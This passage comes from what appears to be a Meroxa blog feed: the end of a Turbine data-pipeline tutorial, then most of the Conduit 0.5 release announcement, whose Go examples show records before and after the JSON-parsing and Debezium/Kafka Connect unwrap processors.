&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;💡 For more information on deployment, you can refer to the Meroxa Docs &lt;a href=&quot;https://docs.meroxa.com/turbine/deployment&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;While we wait, the Meroxa Platform is hard at work wiring all of our resources together; connecting our Bronze source to our function and our function to our Silver and Gold destinations.&lt;/p&gt;
&lt;p&gt;Once our application is deployed we will see that every record that is already in our Bronze source will be written to our Gold and Silver destinations with our updates in hand. The running Turbine application will continue to process all new records as they are written to our Bronze source.&lt;/p&gt;
&lt;p&gt;Meroxa sets up the complex connections and polling logic and lets us focus on the real fun part; writing code.&lt;/p&gt;
&lt;h2&gt;Final Thoughts&lt;/h2&gt;
&lt;p&gt;The Medallion Architecture and the Delta Lake framework combine to be an incredibly powerful way to organize and augment our data. However, a lot of time and effort is often spent on setting up the infrastructure we need to even begin to make use of this powerful combination.&lt;/p&gt;
&lt;p&gt;With Meroxa and Turbine we no longer need to concern ourselves with this complex overhead and instead we can focus on the logic that does the heavy lifting.
We’ve seen that with Meroxa and Turbine we are able to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Stream unstructured data from our Bronze PostgreSQL data source&lt;/li&gt;
&lt;li&gt;Augment our data using whatever logic we want and any libraries or APIs we may need&lt;/li&gt;
&lt;li&gt;Intermediately warehouse our augmented data in an AWS RedShift Database&lt;/li&gt;
&lt;li&gt;Ultimately write our data into an AWS S3 backed Delta Table, ready to be consumed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And we did it all without having to set up any extra infrastructure or streaming logic.&lt;/p&gt;
&lt;p&gt;If you&apos;re interested in learning more about Meroxa, be sure to check out our documentation and Discord community. We support a wide range of source and destination resources, and you can use languages you already know to ingest, orchestrate, transform, and stream data to and from anywhere.&lt;/p&gt;
&lt;p&gt;Thanks for reading, and we hope this post was helpful in your data-driven journey!&lt;/p&gt;
&lt;p&gt;Here are some additional examples of what can be accomplished with Meroxa:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;Using Turbine to Call Multiple APIs in Real-Time to Transform &amp;#x26; Enrich Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;Streaming Changes in Real-Time from MongoDB to Apache Kafka&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa&quot;&gt;Sync Transform Migrate Data in Real-Time from PostgreSQL to MongoDB with Meroxa&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.5 is Now Available]]></title><description><![CDATA[Conduit 0.5: We made an easy-to-configure Dead Letter Queues (DLQ) through HTTP & gRPC, extending health checking, & adding capabilities with Debezium records.]]></description><link>https://meroxa.com/blog/conduit-0.5</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.5</guid><dc:creator><![CDATA[Uchenna Anyanwu]]></dc:creator><pubDate>Tue, 28 Feb 2023 21:18:23 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.5 is out! Conduit’s a tool to help developers build streaming data pipelines between production data stores and messaging systems. For example, if you’ve ever used tools like Kafka Connect, Conduit can be used as a drop-in replacement to help stream data to Apache Kafka. With this release, the goal was to make Conduit easier to operate as a service. This meant, making an easy-to-configure Dead Letter Queues (DLQ) through HTTP and gRPC, extending health checking, and adding more capabilities with Debezium records. Here’s a look at some of the key enhancements in Conduit &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.5.0&quot;&gt;0.5.0&lt;/a&gt; and Conduit &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.5.1&quot;&gt;0.5.1&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Stream Inspector&lt;/h2&gt;
&lt;p&gt;In the Conduit 0.4&lt;a href=&quot;https://meroxa.com/blog/conduit-0.4&quot;&gt;release&lt;/a&gt;, developers could peek at the data as it enters Conduit via source connectors and what the data looks like as it travels to destination connectors. In this release, we have made the stream inspector more complete through the ability to peek at data as it enters or leaves processors by adding methods to the processor interface and endpoints.&lt;/p&gt;
&lt;p&gt;Processor inspection is available &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/processors.md#inspecting-a-processor&quot;&gt;via the API&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Dead Letter Queues&lt;/h2&gt;
&lt;p&gt;In Conduit 0.4 we added &lt;a href=&quot;https://en.wikipedia.org/wiki/Dead_letter_queue&quot;&gt;Dead Letter Queues&lt;/a&gt; (DLQs) that can be configured through pipeline configuration files. In 0.5 we extended this feature by exposing the DLQ configuration through the HTTP and gRPC APIs. Additionally, we added two new metrics that help you keep an eye on the behavior of your DLQ - `conduit_dlq_execution_duration_seconds` is a histogram tracking how long it took to insert records into the DLQ and `conduit_dlq_bytes` gives you an insight into the size of the records sent to the DLQ.&lt;/p&gt;
&lt;p&gt;Check out more information about Dead Letter Queues in our &lt;a href=&quot;https://conduit.io/docs/features/dead-letter-queue&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Unwrap a Debezium record into an OpenCDC record&lt;/h2&gt;
&lt;p&gt;Two main processors were added to Conduit in this release:&lt;/p&gt;
&lt;p&gt;1.) Parse Json Processor: some source connectors tend to create a record that has a raw data (an array of bytes that is not human readable) key, a raw data payload, or both, and if we know that these values are JSON formatted, then this processor can convert the raw data values into structured data (map of strings and values).&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;To parse the key, use `parsejsonkey` processor name.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;To parse the payload, use `&lt;em&gt;parsejsonpayload&lt;/em&gt;` processor name.&lt;/p&gt;
&lt;p&gt;Ex: using the `parsejsonkey` processor, the key can go from looking like this:&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RawData &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Raw&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;uint8&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token number&quot;&gt;0x7b&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x61&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x66&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x74&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x65&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x72&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x3a&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x7b&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x61&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x74&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x61&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x3a&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x34&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x2c&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x69&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x22&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x3a&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x33&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x7d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0x7d&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To This:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token string&quot;&gt;&quot;data&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;2.) Unwrap Processor: source connectors could create a record with another record wrapped inside the payload, so we provided a processor that unwraps the record from the payload and creates a new&lt;a href=&quot;https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture&quot;&gt;OpenCDC&lt;/a&gt; record from it. This processor can unwrap two formats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Debezium: if the payload is a Debezium record, then create a processor with the name “unwrap” and add a configuration “format:debezium” for it. Ex: The record can go from looking like (1) to (2)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;(1)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Metadata&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;conduit.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v0.4.0&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        Before&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                    &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;op&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;source&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                    &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;transaction&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1674061777225&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;(2)&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Operation&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;OperationUpdate&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Metadata&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.readAt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1674061777225000000&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;conduit.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v0.4.0&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        Before&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;StructuredData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RawData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        Raw&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;byte&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;27&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Kafka Connect: if the payload is a Kafka Connect record, then create a processor with the name “unwrap” and add a configuration “format:kafka-connect” for it. Ex: The record can go from looking like (1) to (2)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(1)&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
